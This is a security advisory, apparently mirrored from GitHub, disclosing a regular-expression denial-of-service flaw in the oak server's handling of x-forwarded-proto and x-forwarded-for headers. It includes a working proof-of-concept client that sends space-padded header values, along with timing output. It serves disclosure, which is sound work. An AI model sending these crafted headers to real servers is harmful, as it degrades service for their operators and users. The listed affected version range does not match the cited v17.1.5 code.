Oak Server has ReDoS in x-forwarded-proto and x-forwarded-for headers

Description

Summary

With specially crafted value of the x-forwarded-proto or x-forwarded-for headers, it's possible to significantly slow down an oak server.

Vulnerable Code

  • https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L87
  • https://github.com/oakserver/oak/blob/v17.1.5/request.ts#L142

PoC

  • setup
deno --version
deno 2.4.3
v8 13.7.152.14-rusty
typescript 5.8.3
  • server.ts
import { Application } from "https://deno.land/x/oak/mod.ts";

const app = new Application({proxy: true});

let i = 1

app.use((ctx) => {

    // let url = ctx.request.url   // test1) x-forwarded-proto
    let ips = ctx.request.ips   // test2) x-forwarded-for
    console.log(`request ${i} received`)
    i++;
    ctx.response.body = "hello";
});

await app.listen({ port: 8080 });
  • client.ts
const lengths = [2000, 4000, 8000, 16000, 32000, 64000, 128000]

const data1 = lengths.map(l => 'A' + 'A'.repeat(l) + 'A');
const data2 = lengths.map(l => 'A' + ' '.repeat(l) + 'A');

async function run(data) {
    for (let i = 0; i < data.length; i++) {
        let d = data[i];

        const start = performance.now();

        await fetch("http://localhost:8080", {
            headers: {
                // "x-forwarded-proto": d,  // test1)
                "x-forwarded-for": d,    // test2)
            },
        });

        const end = performance.now();
        console.log('length=%d, time=%d ms', d.length, end - start);
    }
}

console.log("\n[+] Test normal behavior")
await run(data1)
console.log("\n[+] Test payloads")
await run(data2)
  • run
deno run --allow-net server.ts
deno run --allow-net client.ts

[+] Test normal behavior
length=2002, time=14 ms
length=4002, time=6 ms
length=8002, time=3 ms
length=16002, time=3 ms
length=32002, time=2 ms
length=64002, time=4 ms
length=128002, time=3 ms

[+] Test payloads
length=2002, time=7 ms
length=4002, time=22 ms
length=8002, time=77 ms
length=16002, time=241 ms
length=32002, time=947 ms
length=64002, time=4020 ms
length=128002, time=15840 ms

Impact

A specially crafted value of the x-forwarded-proto or x-forwarded-for headers  can be used to significantly slow down an oak server.

Similar Issues

  • https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6
    • https://github.com/denoland/deno/pull/17722
  • https://github.com/websockets/ws/security/advisories/GHSA-6fc8-4gx4-v693
    • https://github.com/websockets/ws/commit/00c425ec77993773d823f018f64a5c44e17023ff

Basic information

Type
reviewed
Severity
medium
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2025-08-12 00:15:00 UTC
Updated
2025-08-12 00:15:02 UTC
GitHub reviewed
2025-08-12 00:15:00 UTC
NVD published
2025-08-08

EPSS Score

Score Percentile
0.07% 20.68%

CVSS Scores

Base score Version Severity Vector
5.3 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:N)
Doesn’t really leak secrets in a meaningful way.
Integrity (I:N)
Data isn’t meaningfully altered or forged.
Availability (A:L)
Might cause slowdowns, glitches, or partial disruption—not a full brick.

Identifiers

CWEs

CWE id Name
CWE-400 Uncontrolled Resource Consumption

Credits

  • dellalibera (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm @oakserver/oak <= 14.1.0

References

cvelogic Threat Intelligence